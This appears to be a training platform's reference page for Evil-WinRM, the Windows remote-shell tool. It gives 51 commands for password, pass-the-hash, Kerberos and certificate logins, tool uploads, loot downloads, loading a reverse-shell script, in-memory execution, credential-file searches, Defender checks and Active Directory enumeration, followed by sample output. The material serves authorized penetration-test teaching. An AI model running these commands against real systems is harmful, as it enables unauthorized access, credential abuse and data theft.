Want to Practice These Techniques?

Try Hackviser's interactive cyber security upskilling platform - Learn by doing!

Evil-WinRM

What is the purpose of Evil-WinRM?

Evil-WinRM is an open-source WinRM shell client used during authorized Windows and Active Directory assessments. It provides an interactive remote PowerShell shell over Windows Remote Management and supports authentication with passwords, NTLM hashes, certificates, and Kerberos-related workflows.

Evil-WinRM is useful because WinRM is common in enterprise Windows environments and often becomes the most direct way to validate credential impact after password spraying, Kerberoasting, NTLM relay, credential dumping, or local administrator reuse. It is commonly used for controlled post-exploitation, remote command execution, file transfer, PowerShell module loading, and Active Directory situational awareness.

Note: Evil-WinRM requires valid credentials or valid authentication material and should only be used in systems where you have explicit authorization. It is not a vulnerability scanner; it is an interactive remote administration and post-exploitation client.

Here are the primary uses of Evil-WinRM:

Interactive WinRM Shell Access: Evil-WinRM opens an interactive PowerShell session against a Windows host when the supplied identity has permission to use WinRM.
Credential Impact Validation: The tool confirms whether usernames, passwords, NTLM hashes, certificates, or Kerberos tickets provide usable remote shell access.
Post-Exploitation File Transfer: Evil-WinRM can upload tools, scripts, and payloads to a target and download evidence or output files from the host.
PowerShell Module Loading: The tool supports loading PowerShell scripts and modules into the remote session, which helps run authorized enumeration and administrative checks.
In-Memory Execution Workflows: Evil-WinRM supports paths for scripts, executables, and dynamic libraries that can be used from the shell to reduce manual transfer friction.
AD and Windows Reconnaissance: After authentication, operators can run Windows and Active Directory commands such as whoami, hostname, ipconfig, net user, PowerView functions, and directory queries.
HTTPS and Certificate-Based Access: Evil-WinRM can connect over SSL/TLS and can authenticate with certificate and private key material when WinRM is configured for it.

Core Features

Interactive WinRM Shell
Remote PowerShell Execution
Password Authentication
Pass-the-Hash Authentication
Certificate Authentication
Kerberos-Aware Workflows
SSL/TLS WinRM Support
Custom Port Support
Domain and Local Account Support
File Upload
File Download
PowerShell Script Loading
PowerShell Module Import
Local Script Path Support
Executable Path Support
Service Path Customization
Log File Support
Custom User-Agent Support
Remote Path Completion Control
Remote Host Completion
Built-In Shell Commands
Windows Post-Exploitation Workflow Support
Active Directory Enumeration Support

Data sources

WinRM Service
WS-Management Endpoint
Valid Usernames
Passwords
NTLM Hashes
Domain Context
Local Account Context
Kerberos Tickets
Client Certificates
Private Keys
Remote PowerShell Session
Remote Filesystem
Local Upload Directory
Local Download Directory
Local PowerShell Scripts
Local Executables
Local Dynamic Libraries
Windows Environment Variables
Active Directory Cmdlets
PowerView Scripts
Remote Command Output
WinRM Event Logs

Common Evil-WinRM Commands

1. Install Evil-WinRM with RubyGems

This command installs Evil-WinRM as a Ruby gem.

gem install evil-winrm

2. Show Help

This command displays Evil-WinRM options.

evil-winrm --help

3. Basic Password Authentication

This command opens an interactive WinRM shell with a username and password.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd'

4. Authenticate with a Domain User

This command authenticates with an explicit domain-qualified username.

evil-winrm -i 192.168.1.20 -u 'CORP\j.doe' -p 'P@ssw0rd'

5. Prompt for the Password

This command omits the password argument so Evil-WinRM prompts for it interactively.

evil-winrm -i 192.168.1.20 -u 'CORP\j.doe'

6. Pass-the-Hash Authentication

This command authenticates with an NTLM hash instead of a plaintext password.

evil-winrm -i 192.168.1.20 -u administrator -H 32ed87bdb5fdc5e9cba88547376818d4

7. Authenticate with a Kerberos Ticket

This command uses a Kerberos ticket file and realm. The target should be provided as an FQDN for Kerberos workflows.

evil-winrm -i ws01.corp.local -r CORP.LOCAL -K admin.ccache

8. Set a Custom Kerberos SPN Prefix

This command sets the SPN prefix used for Kerberos authentication.

evil-winrm -i ws01.corp.local -r CORP.LOCAL -K admin.ccache --spn HTTP

9. Connect Over HTTPS

This command uses SSL/TLS for WinRM, commonly on port 5986.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -S

10. Use a Custom WinRM Port

This command connects to a non-default WinRM port.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -P 5986 -S

11. Connect by Hostname

This command connects to a hostname instead of an IP address.

evil-winrm -i ws01.corp.local -u 'CORP\j.doe' -p 'P@ssw0rd'

12. Use Certificate Authentication

This command authenticates with a client certificate and private key.

evil-winrm -i 192.168.1.20 -S -c cert.pem -k key.pem

13. Use a Custom WinRM URL Endpoint

This command sets a custom remote WinRM URL endpoint.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -U /wsman

14. Set a Custom User-Agent

This command changes the WinRM client user-agent string.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -a 'Microsoft WinRM Client'

15. Enable Session Logging

This command enables Evil-WinRM session logging.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -l

16. Set a Scripts Directory

This command makes local PowerShell scripts available inside the Evil-WinRM session.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -s ./scripts

17. Set an Executables Directory

This command makes local executables available for upload and execution workflows.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -e ./bin

18. Disable Color Output

This command disables colored prompt and output text.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -n

19. Disable Remote Path Completion

This command disables remote path completion when it is slow or noisy.

evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -N

20. Run Evil-WinRM with Docker

This command runs Evil-WinRM from a container with local script and data directories mounted.

docker run --rm -ti --name evil-winrm -v ./scripts:/ps1_scripts -v ./bin:/exe_files -v ./data:/data oscarakaelvis/evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd' -s /ps1_scripts -e /exe_files

21. Load a PowerShell Script Inside the Session

This Evil-WinRM shell command loads a script from the configured scripts path.

*Evil-WinRM* PS C:\Users\j.doe\Documents> menu
*Evil-WinRM* PS C:\Users\j.doe\Documents> Invoke-PowerShellTcp.ps1

22. Upload a File

This Evil-WinRM shell command uploads a local file to the current remote directory.

*Evil-WinRM* PS C:\Users\j.doe\Documents> upload ./SharpHound.exe

23. Upload to a Specific Remote Path

This command uploads a local file to a selected path on the target.

*Evil-WinRM* PS C:\Users\j.doe\Documents> upload ./tool.exe C:\Windows\Temp\tool.exe

24. Download a File

This command downloads a remote file to the local working directory.

*Evil-WinRM* PS C:\Users\j.doe\Documents> download C:\Windows\Temp\loot.txt

25. Download to a Specific Local Path

This command saves a remote file to a chosen local path.

*Evil-WinRM* PS C:\Users\j.doe\Documents> download C:\Windows\Temp\loot.txt ./loot/ws01-loot.txt

26. List Built-In Evil-WinRM Functions

This command prints Evil-WinRM built-in functions and functions loaded from scripts.

*Evil-WinRM* PS C:\Users\j.doe\Documents> menu

27. List Services with Evil-WinRM

This built-in command lists services and shows whether the current account has permissions over them.

*Evil-WinRM* PS C:\Users\j.doe\Documents> services

28. Print the Current Identity

This command shows the user context of the remote shell.

*Evil-WinRM* PS C:\Users\j.doe\Documents> whoami /all

29. Check the Hostname

This command prints the remote computer name.

*Evil-WinRM* PS C:\Users\j.doe\Documents> hostname

30. Check Network Configuration

This command prints IP configuration from the remote host.

*Evil-WinRM* PS C:\Users\j.doe\Documents> ipconfig /all

31. Check Local Administrators

This command lists local administrators on the remote host.

*Evil-WinRM* PS C:\Users\j.doe\Documents> net localgroup administrators

32. Check Domain Information

This command shows the joined domain and logon server context.

*Evil-WinRM* PS C:\Users\j.doe\Documents> echo $env:USERDOMAIN
*Evil-WinRM* PS C:\Users\j.doe\Documents> echo $env:LOGONSERVER

33. List Domain Users

This command queries domain users from the remote session.

*Evil-WinRM* PS C:\Users\j.doe\Documents> net user /domain

34. List Domain Groups

This command queries domain groups from the remote session.

*Evil-WinRM* PS C:\Users\j.doe\Documents> net group /domain

35. Import PowerView

This command loads PowerView from the configured scripts path.

*Evil-WinRM* PS C:\Users\j.doe\Documents> menu
*Evil-WinRM* PS C:\Users\j.doe\Documents> PowerView.ps1

36. Run a PowerView Domain Query

This command queries domain computers after PowerView is loaded.

*Evil-WinRM* PS C:\Users\j.doe\Documents> Get-DomainComputer -Properties dnshostname,operatingsystem

37. Run a .NET Assembly from Memory

This command runs a configured executable through Evil-WinRM's Invoke-Binary workflow.

*Evil-WinRM* PS C:\Users\j.doe\Documents> Invoke-Binary /opt/csharp/Seatbelt.exe

38. Search Writable Paths

This command helps identify directories where the current identity can write.

*Evil-WinRM* PS C:\Users\j.doe\Documents> Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.PSIsContainer -and (Test-Path "$($_.FullName)\." -PathType Container)}

39. Create a Working Directory

This command creates a temporary working directory.

*Evil-WinRM* PS C:\Users\j.doe\Documents> mkdir C:\Windows\Temp\hv

40. Run an Uploaded Executable

This command executes a file uploaded to the target.

*Evil-WinRM* PS C:\Users\j.doe\Documents> C:\Windows\Temp\tool.exe

41. Execute a PowerShell One-Liner

This command runs a PowerShell expression inside the remote shell.

*Evil-WinRM* PS C:\Users\j.doe\Documents> powershell -NoProfile -ExecutionPolicy Bypass -Command "Get-Process | Select-Object -First 5"

42. Check PowerShell Language Mode

This command checks whether PowerShell is constrained.

*Evil-WinRM* PS C:\Users\j.doe\Documents> $ExecutionContext.SessionState.LanguageMode

43. Check Defender Status

This command prints Microsoft Defender status when available.

*Evil-WinRM* PS C:\Users\j.doe\Documents> Get-MpComputerStatus

44. List Local Sessions

This command checks logged-on users through common Windows commands.

*Evil-WinRM* PS C:\Users\j.doe\Documents> quser

45. Search for Interesting Files

This command searches user directories for files with sensitive-looking names.

*Evil-WinRM* PS C:\Users\j.doe\Documents> Get-ChildItem C:\Users -Recurse -Include *password*,*secret*,*key* -ErrorAction SilentlyContinue

46. Read a File

This command prints a remote text file.

*Evil-WinRM* PS C:\Users\j.doe\Documents> type C:\Windows\Temp\loot.txt

47. Check Current Privileges

This command lists assigned privileges for the current token.

*Evil-WinRM* PS C:\Users\j.doe\Documents> whoami /priv

48. Check Running Services

This command lists running services and their binary paths.

*Evil-WinRM* PS C:\Users\j.doe\Documents> Get-CimInstance Win32_Service | Select-Object Name,State,StartName,PathName

49. Exit the Session

This command closes the Evil-WinRM shell.

*Evil-WinRM* PS C:\Users\j.doe\Documents> exit

50. Validate WinRM with NetExec First

This command checks whether credentials can authenticate to WinRM before opening an interactive shell.

nxc winrm 192.168.1.20 -u 'CORP\j.doe' -p 'P@ssw0rd'

51. Scan for WinRM with Nmap

This command checks whether default WinRM ports are open before attempting a session.

nmap -p 5985,5986 -sV 192.168.1.20

Output Examples

Command	Description	Example Output
`evil-winrm --help`	Shows supported options.	`Usage: evil-winrm -i IP -u USER -p PASS`
`evil-winrm -i 192.168.1.20 -u administrator -p 'P@ssw0rd'`	Opens a password-based WinRM shell.	`Evil-WinRM shell v3.x` `Evil-WinRM PS C:\Users\Administrator\Documents>`
`evil-winrm -i 192.168.1.20 -u administrator -H <nt_hash>`	Opens a pass-the-hash WinRM shell.	`Info: Establishing connection to remote endpoint` `Evil-WinRM PS C:\Users\Administrator\Documents>`
`evil-winrm -i 192.168.1.20 -S -c cert.pem -k key.pem`	Authenticates with certificate material.	`Info: Establishing connection to remote endpoint`
`upload ./SharpHound.exe`	Uploads a local file from inside the shell.	`Info: Uploading ./SharpHound.exe to C:\Users\j.doe\Documents\SharpHound.exe`
`download C:\Windows\Temp\loot.txt`	Downloads a remote file from inside the shell.	`Info: Downloading C:\Windows\Temp\loot.txt to loot.txt`
`whoami /all`	Shows the current token, groups, and privileges.	`corp\j.doe` `BUILTIN\Remote Management Users`
`hostname`	Prints the target hostname.	`WS01`
`Get-MpComputerStatus`	Checks Defender status.	`AMServiceEnabled : True` `RealTimeProtectionEnabled : True`
`nxc winrm 192.168.1.20 -u 'CORP\j.doe' -p 'P@ssw0rd'`	Validates WinRM access before shelling in.	`WINRM 192.168.1.20 5985 WS01 [+] CORP\j.doe:P@ssw0rd (Pwn3d!)`

Want to Practice These Techniques?

Evil-WinRM

What is the purpose of Evil-WinRM?​

Core Features​

Data sources​

Common Evil-WinRM Commands​

1. Install Evil-WinRM with RubyGems​

2. Show Help​

3. Basic Password Authentication​

4. Authenticate with a Domain User​

5. Prompt for the Password​

6. Pass-the-Hash Authentication​

7. Authenticate with a Kerberos Ticket​

8. Set a Custom Kerberos SPN Prefix​

9. Connect Over HTTPS​

10. Use a Custom WinRM Port​

11. Connect by Hostname​

12. Use Certificate Authentication​

13. Use a Custom WinRM URL Endpoint​

14. Set a Custom User-Agent​

15. Enable Session Logging​

16. Set a Scripts Directory​

17. Set an Executables Directory​

18. Disable Color Output​

19. Disable Remote Path Completion​

20. Run Evil-WinRM with Docker​

21. Load a PowerShell Script Inside the Session​

22. Upload a File​

23. Upload to a Specific Remote Path​

24. Download a File​

25. Download to a Specific Local Path​

26. List Built-In Evil-WinRM Functions​

27. List Services with Evil-WinRM​

28. Print the Current Identity​

29. Check the Hostname​

30. Check Network Configuration​

31. Check Local Administrators​

32. Check Domain Information​

33. List Domain Users​

34. List Domain Groups​

35. Import PowerView​

36. Run a PowerView Domain Query​

37. Run a .NET Assembly from Memory​

38. Search Writable Paths​

39. Create a Working Directory​

40. Run an Uploaded Executable​

41. Execute a PowerShell One-Liner​

42. Check PowerShell Language Mode​

43. Check Defender Status​

44. List Local Sessions​

45. Search for Interesting Files​

46. Read a File​

47. Check Current Privileges​

48. Check Running Services​

49. Exit the Session​

50. Validate WinRM with NetExec First​

51. Scan for WinRM with Nmap​

Output Examples​